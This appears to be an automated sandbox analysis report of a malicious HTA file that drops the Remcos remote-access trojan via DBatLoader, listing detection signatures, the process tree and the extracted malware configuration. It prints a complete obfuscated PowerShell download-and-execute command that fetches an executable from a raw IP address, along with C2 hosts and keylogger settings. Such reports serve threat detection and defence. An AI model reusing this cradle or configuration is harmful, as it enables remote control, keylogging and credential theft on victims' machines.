Windows
Analysis Report
greatindiancompaniesgivenbestgiftforyourhealthgivengoodreturns.hta
Overview
General Information
Detection
Cobalt Strike, Remcos, DBatLoader
Score | Range | Whitelisted | Confidence |
---|---|---|---|
100 | 0 - 100 | false | 100% |
Signatures
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected Cobalt Strike Beacon
Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected DBatLoader
Yara detected Remcos RAT
Yara detected obfuscated html page
AI detected suspicious sample
Allocates many large memory chunks
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Drops PE files with a suspicious file extension
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
PowerShell case anomaly found
Powershell drops PE file
Queues an APC in another process (thread injection)
Sample is not signed and drops a device driver
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Suspicious Creation with Colorcpl
Sigma detected: Suspicious MSHTA Child Process
Suspicious command line found
Suspicious powershell command line found
Abnormal high CPU Usage
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match
Classification
- System is w10x64
- mshta.exe (PID: 6936 cmdline: mshta.exe "C:\Users\user\Desktop\greatindiancompaniesgivenbestgiftforyourhealthgivengoodreturns.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
- cmd.exe (PID: 6356 cmdline: "C:\Windows\system32\cmd.exe" "/C PoWERSHeLl.Exe -EX bypAsS -noP -w 1 -c DEVICeCreDEnTIaLDePLOYmEnT.EXe ; invoke-EXPresSIon($(InvoKe-ExpressION('[sYsTeM.TEXT.EnCOdiNG]'+[CHaR]58+[cHAR]58+'Utf8.geTSTriNg([SysTEM.CONvErt]'+[chAr]0X3a+[chAR]58+'FromBaSE64StRinG('+[chAr]0x22+'JFYwICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLXR5cEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFcmRlZklOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTG1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ0ZYLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0c0FYcFFDSkpsLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnYndUS2dWdEVIZSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9NZHVKcUpRUWFCLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ1QUxUUUprTXlpIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZVNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhBVHFRICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFYwOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTczLjIxNC4xNjcuNzQvNDQ0L25pY2Vyb3NlLmV4ZSIsIiRlbnY6QVBQREFUQVxuaWNlcm9zZS5leGUiLDAsMCk7c1RhclQtU0xFRVAoMyk7SW5WT0tFLWVYcFJFU3NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxuaWNlcm9zZS5leGUi'+[ChAR]34+'))')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 6312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 2488 cmdline: PoWERSHeLl.Exe -EX bypAsS -noP -w 1 -c DEVICeCreDEnTIaLDePLOYmEnT.EXe ; invoke-EXPresSIon($(InvoKe-ExpressION('[sYsTeM.TEXT.EnCOdiNG]'+[CHaR]58+[cHAR]58+'Utf8.geTSTriNg([SysTEM.CONvErt]'+[chAr]0X3a+[chAR]58+'FromBaSE64StRinG('+[chAr]0x22+'JFYwICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLXR5cEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFcmRlZklOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTG1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ0ZYLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0c0FYcFFDSkpsLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnYndUS2dWdEVIZSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9NZHVKcUpRUWFCLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ1QUxUUUprTXlpIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZVNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhBVHFRICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFYwOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTczLjIxNC4xNjcuNzQvNDQ0L25pY2Vyb3NlLmV4ZSIsIiRlbnY6QVBQREFUQVxuaWNlcm9zZS5leGUiLDAsMCk7c1RhclQtU0xFRVAoMyk7SW5WT0tFLWVYcFJFU3NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxuaWNlcm9zZS5leGUi'+[ChAR]34+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- csc.exe (PID: 4900 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mk3z1vxw\mk3z1vxw.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
- cvtres.exe (PID: 2860 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDF90.tmp" "c:\Users\user\AppData\Local\Temp\mk3z1vxw\CSCE89B4642338842338CD923B6CF8B4F17.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
- nicerose.exe (PID: 6500 cmdline: "C:\Users\user\AppData\Roaming\nicerose.exe" MD5: CCDCD04A0FFDE31366754018598EB02F)
- cmd.exe (PID: 1276 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 5888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- colorcpl.exe (PID: 5368 cmdline: C:\Windows\System32\colorcpl.exe MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
- Emxwenem.PIF (PID: 6384 cmdline: "C:\Users\Public\Libraries\Emxwenem.PIF" MD5: CCDCD04A0FFDE31366754018598EB02F)
- cmd.exe (PID: 7104 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 1664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- colorcpl.exe (PID: 4940 cmdline: C:\Windows\System32\colorcpl.exe MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
- Emxwenem.PIF (PID: 7164 cmdline: "C:\Users\Public\Libraries\Emxwenem.PIF" MD5: CCDCD04A0FFDE31366754018598EB02F)
- cmd.exe (PID: 708 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 6072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- colorcpl.exe (PID: 3864 cmdline: C:\Windows\System32\colorcpl.exe MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Remcos, RemcosRAT | Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity. | | | |
DBatLoader | This Delphi loader misuses Cloud storage services, such as Google Drive, to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it. | No Attribution | | |
{"Download Url": ["https://www.maan2u.com/docs/233_Emxwenemixg"]}
{"Host:Port:Password": ["185.174.103.111:2404:1", "185.174.103.111:2468:1", "apostlejob2.duckdns.org:2468:1", "apostlejob2.duckdns.org:2404:1"], "Assigned name": "Big Money 1", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Rmc-3W4HX7", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "100"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Obshtml | Yara detected obfuscated html page | Joe Security | | |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | | |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | | |
JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security | | |
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | | |
Windows_Trojan_Remcos_b296e965 | unknown | unknown | | |
REMCOS_RAT_variants | unknown | unknown | | |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | | |
Windows_Trojan_Remcos_b296e965 | unknown | unknown | | |
REMCOS_RAT_variants | unknown | unknown | | |
INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer | detects Windows executables potentially bypassing UAC using eventvwr.exe | ditekSHen | | |
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | | |
System Summary |
---|
Source: | Author: frack113, Nasreddine Bencherchali: |
Source: | Author: Florian Roth (Nextron Systems), Tim Shelton: |
Source: | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: frack113: |
Source: | Author: Michael Haag: |